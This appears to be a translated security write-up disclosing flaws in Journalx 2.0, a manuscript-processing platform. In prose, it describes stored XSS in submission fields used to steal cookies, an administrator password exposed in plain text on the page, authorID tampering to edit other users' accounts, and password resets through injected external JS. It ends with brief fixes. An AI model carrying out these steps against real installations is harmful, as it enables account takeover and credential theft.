Journalx 2.0 storage xss
Journalx 2.0, a remote processing system for Journal manuscripts, is independently developed by Beijing magtek and is a leading new-generation remote processing platform in China.
#1 Cookie
Register an author account, enter the author workbench, and select contribute
Write the xss poc in the topic column,
Store XSS is triggered during review management, and the cookie is successfully hit.
Of course, more than one framework of the question will trigger the Poc. The author's name, keyword, abstract, and body all have Store XSS. The method of exploitation is the same as that of the question.
#2 get the management password
When we came to the Personal Information Modification page, we were shocked. Why are the manufacturers so domineering?
Store Passwords in plain text on the web Front-end. You only need to use Store XSS to execute a piece of JS code to get the value from the html element and then you can directly get the Administrator's password.
This is just the first thing I was shocked by. I was even more shocked at the back and glanced at the URL above.
After I modified the authorID, my old friends and I were shocked.
Directly operate on other users, including viewing the password. However, the administrator of this station is not the admin. It is a normal author to log in .... Sorry, leave the question...
In addition to changing the password, this is also the case for personal information. If you modify the authorID, you can directly edit the information of other users.
My old friend and I were shocked again... Here, you only need to use Store XSS for the simplest location grabbing. After obtaining the authorID, You can forcibly escalate the permission to operate, control, and modify any administrator stuff.
Of course, stupid people can directly perform FUZZING.
#3 reset the management password
Like #2, Store XSS is used to load external JS, send data packets directly, and reset the user password in the current domain,
Security is a whole. Do not underestimate Store XSS.
Solution:
1. Filter
2. Check the cookie to prevent unauthorized access.
3. control domain